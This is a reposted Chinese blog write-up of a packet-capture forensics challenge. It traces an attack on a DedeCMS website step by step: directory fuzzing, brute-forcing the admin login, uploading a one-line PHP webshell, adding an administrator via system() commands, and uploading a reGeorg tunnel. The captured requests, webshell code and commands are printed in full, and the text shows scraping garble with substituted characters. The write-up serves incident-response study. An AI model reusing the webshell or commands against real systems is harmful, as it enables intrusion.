数据分析-企业渗透过程

时间  2019-12-09
标签 数据 分析 企业 渗透 过程 繁體版
原文   原文链接

数据分析-企业渗透过程php

前记

本篇文章对真实企业渗透流量进行分析,其中包括最开始的目录爆破,到最后的反向代理文件上传成功html

题目要求

黑客拿到一台服务器的权限,以后进行了内网渗透
1.被攻击的服务器的内网地址
2.被攻击的服务器的外网地址
3.攻击者的ip地址
4.爆破出的后台地址
5.爆破出的后台登陆用户名和密码
6.webshell的完整路径
7.被攻击服务器的主机名
8.被攻击服务器的网站根目录
9.黑客得到的权限

数据分析

题目给了大约6个G的数据文件
直接盲目追踪tcp流显然是很是愚钝的方式。
咱们的首要目标应该是筛选出攻击者ip和受害者ip
从而实现有效的定点溯源
而日志文件这个时候就成了很好的切入点web

日志文件打开切入点

咱们选择日志文件查看
排除内网地址,咱们能够看到ipshell

202.99.27.194

 

疯狂对网站发起请求
因而基本能够肯定此ip为攻击者
因而咱们去wireshark中过滤出相应的攻击流服务器

第一个数据包分析

打开第一个数据流,咱们尝试命令app

ip.src == 202.99.27.194 && http
能够发现大量流量以下图

 

不难发现受害者内网ip为tcp

172.16.60.199
 
同时得知黑客攻击的第一步为fuzz目标网站目录
而后咱们调用wireshark的http负载分配功能

不可贵出,受害者外网ip为工具

118.194.196.232
 

至此咱们已经完成了题目的前3题:post

1.被攻击的服务器的内网地址
2.被攻击的服务器的外网地址
3.攻击者的ip地址
 
答案:
172.16.60.199
118.194.196.232
202.99.27.194
 

第二个数据包分析

而后题目要求咱们找出后台地址
故此咱们使用过滤条件
ip.src == 202.99.27.194 && http
不难发如今第二个数据文件中,有以下结果

黑客不断对  /simplexue/login.php网站

进行post数据
咱们查看post内容,随便选取一个http请求头查看

POST /simplexue/login.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://118.194.196.232:800/simplexue/login.php
Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=qwerty

不难看出黑客在尝试密码爆破

userid=admin&pwd=qwerty
 
故此猜想出,该地址为受害者网站后台
而后咱们继续追踪,查看黑客是否爆破登陆成功
过滤指令以下: 
ip.src == 202.99.27.194 && http.request.method=="POST"

而后咱们将结果按照爆破时间排序
发现最后一次post结果为

gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=admin123&sm1=
即 
userid=admin&pwd=admin123
而且发现发现响应包
Set-Cookie: DedeUserID=1; expires=Wed, 10-Aug-2016 02:36:28 GMT; path=/
其中
DedeUserID=1
 
故此判断应该登陆成功
而且看到后面的标题
<title>DedeCMS........</title>

还能发现受害者网站使用了DedeCMS

 

第四个数据包分析

为何没有第三个数据包分析= =
由于第三个是黑客在寻找后台功能,最终找到可上传文件点
这里就直接看第4个数据包了,由于基本都有涉及
咱们使用以下指令

ip.src == 202.99.27.194 && http.request.method=="POST"

不难发现

咱们查看

/simplexue/file_manage_control.php
能够发现黑客上传的http请求头 
POST /simplexue/file_manage_control.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------76031573231889
Content-Length: 591
-----------------------------76031573231889
Content-Disposition: form-data; name="activepath"
/uploads
-----------------------------76031573231889
Content-Disposition: form-data; name="fmdo"
upload
-----------------------------76031573231889
Content-Disposition: form-data; name="upfile1"; filename="jian.php"
Content-Type: application/octet-stream
<?php eval($_POST[g]);?>
<?php eval($_POST[g]);?>
<?php eval($_POST[g]);?>
-----------------------------76031573231889
Content-Disposition: form-data; name="B1"
 ........ 
-----------------------------76031573231889--

黑客上传了一个名为jian.php

一句话木马文件
其中代码为  <?php eval($_POST[g]);?>

到此咱们已经又完成了2道题目

4.爆破出的后台地址
5.爆破出的后台登陆用户名和密码
答案:
/simplexue/login.php
userid=admin&pwd=admin123
 
咱们接着查看下一题
6.webshell的完整路径
咱们查看黑客的第一条指令的http头 
POST /uploads/jian.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
g=phpinfo();

不难发现黑客执行了phpinfo()命令
返回中能够看到

<b>Notice</b>: Use of undefined constant g - assumed 'g' in <b>C:\phpStudy\WWW\dedecms\uploads\jian.php</b> on line <b>1</b><br />

便可发现webshell的绝对路径

C:\phpStudy\WWW\dedecms\uploads\jian.php
而后咱们依次查看黑客执行的命令 
Form item: "g" = "system("whoami");"
system("net user test test /ad");
system("net localgroup administrators test /ad");
system("net user test");
system("netstat -ano");

不难发现黑客添加了管理员用户,帐号密码为test  test

而且  netstat -ano

内容为

Proto  Local Address          Foreign Address        State           PID
TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1512
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       960
TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4008
TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
TCP    0.0.0.0:1039           0.0.0.0:0              LISTENING       668
TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1608
TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       4088
TCP    172.16.60.199:80       202.99.27.194:41601    ESTABLISHED     392
TCP    172.16.60.199:135      172.16.60.199:3869     ESTABLISHED     960
TCP    172.16.60.199:139      0.0.0.0:0              LISTENING       4
TCP    172.16.60.199:3144     95.80.107.117:3389     ESTABLISHED     1108
TCP    172.16.60.199:3160     193.124.23.254:3389    ESTABLISHED     1108
TCP    172.16.60.199:3162     200.27

发现开放端口:80 135 443 445 1039 3306 3389

为了更加详细的了解目标网站的存在问题
咱们导出phpinfo文件
保存为1.html
便可发现

Windows NT SIMPLE-W7LOIJIF 5.2 build 3790 (Windows Server 2003 Enterprise Edition Service Pack 1) i586
能够发现主机名为 SIMPLE-W7LOIJIF
 
至此
9道题目所有完结

 

继续探索

可是咱们的深刻研究之路还未结束,咱们继续日后发掘
在第6个数据包里
咱们执行过滤指令以下

ip.src == 202.99.27.194 && http
不难看到,黑客再次使用了上传功能

其中咱们看见上传内容 
POST /simplexue/file_manage_control.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------102512441528556
Content-Length: 6315
-----------------------------102512441528556
Content-Disposition: form-data; name="activepath"
/uploads
-----------------------------102512441528556
Content-Disposition: form-data; name="fmdo"
upload
-----------------------------102512441528556
Content-Disposition: form-data; name="upfile1"; filename="tunnel.php"
Content-Type: application/octet-stream
<?php
/*                   _____                                    
   ____   ______  __|___  |__  ______  _____  _____   ______  
 |     | |   ___||   ___|    ||   ___|/     \|     | |   ___| 
 |     \ |   ___||   |  |    ||   ___||     ||     \ |   |

 

根据上传文件名,咱们百度进行搜索
发现这是一个内网反向代理的文件
工具名为:http_reGeorg
而后咱们又在最后一个数据包里发现了黑客对反向代理文件的操做以下图

最后黑客利用file_manage_control.php
删除了本身上传的反向代理文件tunnel.php

POST /simplexue/file_manage_control.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=del&filename=tunnel.php&activepath=
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
fmdo=del&activepath=&filename=tunnel.php&imageField1.x=34&imageField1.y=17

 

而后,黑客删除了本身添加的用户

Form item: "g" = "system("net user test /del");"
Form item: "g" = "system("net user");"

最后,黑客再次利用file_manage_control.php删除了本身的一句话木马文件

POST /simplexue/file_manage_control.php HTTP/1.1
Host: 118.194.196.232:800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=del&filename=jian.php&activepath=%2Fuploads
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
fmdo=del&activepath=%2Fuploads&filename=jian.php&imageField1.x=31&imageField1.y=17

 

至此全渗透过程结束

 

后记

整体来讲,黑客作了以下事情

1.目录爆破
2.爆破后台管理员帐户
3.寻找利用后台可利用功能
4.一句话木立刻传
5.利用木马在目标机器上添加管理员用户
6.黑客上传反向代理文件
7.黑客进行内网渗透
8.黑客结束渗透,进行尾部处理工做

 

任重而道远!

文章转载自(http://skysec.top/2018/04/21/%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90-%E4%BC%81%E4%B8%9A%E6%B8%97%E9%80%8F%E8%BF%87%E7%A8%8B/)

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程